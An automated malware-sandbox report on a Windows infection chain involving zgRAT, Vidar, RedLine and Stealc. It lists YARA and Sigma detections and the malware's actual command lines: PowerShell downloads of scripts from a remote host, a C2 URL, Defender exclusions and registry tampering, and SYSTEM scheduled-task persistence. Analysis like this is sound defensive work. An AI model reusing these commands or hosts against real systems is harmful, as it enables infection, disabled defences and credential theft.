zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Vidar

{"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\wygmbcpqogng	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\wygmbcpqogng	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\wygmbcpqogng	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
C:\Users\user\AppData\Local\Temp\u2xs.3.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\Users\user\AppData\Local\Temp\iolo\dm\BIT157D.tmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Temp\iolo\dm\BIT157D.tmp	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Temp\iolo\dm\BIT157D.tmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\iolo\dm\BIT157D.tmp	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x2e0d82:$s1: file:/// 0x37622b4:$s1: file:/// 0x2e0c8e:$s2: {11111-22222-10009-11112} 0x37621c4:$s2: {11111-22222-10009-11112} 0x2e0d12:$s3: {11111-22222-50001-00000} 0x3762244:$s3: {11111-22222-50001-00000} 0x2def8d:$s4: get_Module 0x35d4c17:$s4: get_Module 0x36d9e29:$s4: get_Module 0x3760477:$s4: get_Module 0x119d1a:$s5: Reverse 0x2df2ba:$s5: Reverse 0x35d606a:$s5: Reverse 0x36164de:$s5: Reverse 0x376075d:$s5: Reverse 0x11e961:$s6: BlockCopy 0x2dc197:$s6: BlockCopy 0x36e6142:$s6: BlockCopy 0x377ebcb:$s6: BlockCopy 0x11a25f:$s7: ReadByte 0x36dc30d:$s7: ReadByte
Click to see the 3 entries

Memory Dumps

Source	Rule	Description	Author	Strings
0000000F.00000000.2324296887.0000000000401000.00000020.00000001.01000000.00000011.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
0000000B.00000002.2396139985.0000000004223000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000006.00000002.2693695310.0000000004095000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1388:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000006.00000003.2342660108.00000000070AB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000008.00000002.2984027332.000000000427A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000D.00000002.2655895440.0000000005870000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.2655895440.0000000005870000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000008.00000002.2983285998.0000000004265000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x860:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000008.00000003.2144160869.00000000041B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000008.00000003.2144160869.00000000041B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000048.00000002.2693112601.000000000335E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000045.00000002.3254906571.0000000001102000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000045.00000002.3254906571.0000000001102000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000D.00000002.2649003331.0000000004F92000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000008.00000002.2972613592.0000000004180000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000008.00000002.2972613592.0000000004180000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000008.00000002.2972613592.0000000004180000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: u2xs.0.exe PID: 5788	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: u2xs.0.exe PID: 5788	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: u2xs.0.exe PID: 5788	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: run.exe PID: 4820	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 5616	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cmd.exe PID: 5616	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 5616	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 5860	JoeSecurity_SectopRAT	Yara detected SectopRAT	Joe Security
Process Memory Space: MSBuild.exe PID: 5860	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 5860	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: powershell.exe PID: 1020	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: run.exe PID: 5664	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.run.exe.426ed5b.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.run.exe.426ed5b.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
8.3.u2xs.0.exe.41b0000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
8.3.u2xs.0.exe.41b0000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
13.2.cmd.exe.58700c8.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.cmd.exe.58700c8.8.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
8.2.u2xs.0.exe.4180e67.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
13.2.cmd.exe.4fdce64.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
8.2.u2xs.0.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
8.2.u2xs.0.exe.400000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
8.2.u2xs.0.exe.4180e67.1.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
13.2.cmd.exe.4fdce64.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
13.2.cmd.exe.58700c8.8.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb684a:$s14: keybd_event 0xbd5b9:$v1_1: grabber@ 0xb741c:$v1_2: <BrowserProfile>k__ 0xb7e95:$v1_3: <SystemHardwares>k__ 0xb7f54:$v1_5: <ScannedWallets>k__ 0xb7fe4:$v1_6: <DicrFiles>k__ 0xb7fc0:$v1_7: <MessageClientFiles>k__ 0xb838a:$v1_8: <ScanBrowsers>k__BackingField 0xb83dc:$v1_8: <ScanWallets>k__BackingField 0xb83f9:$v1_8: <ScanScreen>k__BackingField 0xb8433:$v1_8: <ScanVPN>k__BackingField 0xa9c62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xa956e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
72.2.run.exe.336586d.6.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
72.2.run.exe.336586d.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
8.2.u2xs.0.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
8.2.u2xs.0.exe.400000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
72.2.run.exe.33a915b.7.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
72.2.run.exe.33a915b.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
13.2.cmd.exe.4fdc264.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
13.2.cmd.exe.4fdc264.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
13.2.cmd.exe.58700c8.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.cmd.exe.58700c8.8.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
13.2.cmd.exe.58700c8.8.raw.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
72.2.run.exe.33a9d5b.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
72.2.run.exe.33a9d5b.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
8.2.u2xs.0.exe.4180e67.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
8.2.u2xs.0.exe.4180e67.1.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
8.3.u2xs.0.exe.41b0000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
8.3.u2xs.0.exe.41b0000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
13.2.cmd.exe.4f98976.6.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
13.2.cmd.exe.4f98976.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
69.2.MSBuild.exe.1100000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
69.2.MSBuild.exe.1100000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
69.2.MSBuild.exe.1100000.0.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
11.2.run.exe.426e15b.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.run.exe.426e15b.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
11.2.run.exe.422a86d.6.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.run.exe.422a86d.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
15.0.u2xs.3.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 35 entries

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt", CommandLine: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\forfiles.exe, NewProcessName: C:\Windows\SysWOW64\forfiles.exe, OriginalFileName: C:\Windows\SysWOW64\forfiles.exe, ParentCommandLine: .\Install.exe /Bdidlg "385128" /S, ParentImage: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe, ParentProcessId: 6036, ParentProcessName: Install.exe, ProcessCommandLine: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt", ProcessId: 356, ProcessName: forfiles.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True, CommandLine: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True, CommandLine|base64offset|contains: <, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8028, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True, ProcessId: 8148, ProcessName: WMIC.exe

Sigma detected: PowerShell DownloadFile

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')", CommandLine: powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd" /c "C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\lood.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1048, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')", ProcessId: 6980, ProcessName: powershell.exe

Sigma detected: Powerup Write Hijack DLL

Source: File created

Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6980, TargetFilename: C:\Users\user\AppData\Local\Temp\i2.bat

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 17:12:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe\" Wt /gCsdidCeBm 385128 /S" /V1 /F, CommandLine: schtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 17:12:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe\" Wt /gCsdidCeBm 385128 /S" /V1 /F, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: .\Install.exe /Bdidlg "385128" /S, ParentImage: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe, ParentProcessId: 6036, ParentProcessName: Install.exe, ProcessCommandLine: schtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 17:12:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe\" Wt /gCsdidCeBm 385128 /S" /V1 /F, ProcessId: 7568, ProcessName: schtasks.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6980, TargetFilename: C:\Users\user\AppData\Local\Temp\i2.bat

Sigma detected: PowerShell Download Pattern

Source: Process started

Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')", CommandLine: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd" /c "C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\lood.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1048, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')", ProcessId: 5428, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')", CommandLine: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd" /c "C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\lood.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1048, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')", ProcessId: 5428, ProcessName: powershell.exe

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\svchost.exe, ProcessId: 5548, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITA80.tmp

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force", CommandLine: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: .\Install.exe /Bdidlg "385128" /S, ParentImage: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe, ParentProcessId: 6036, ParentProcessName: Install.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add 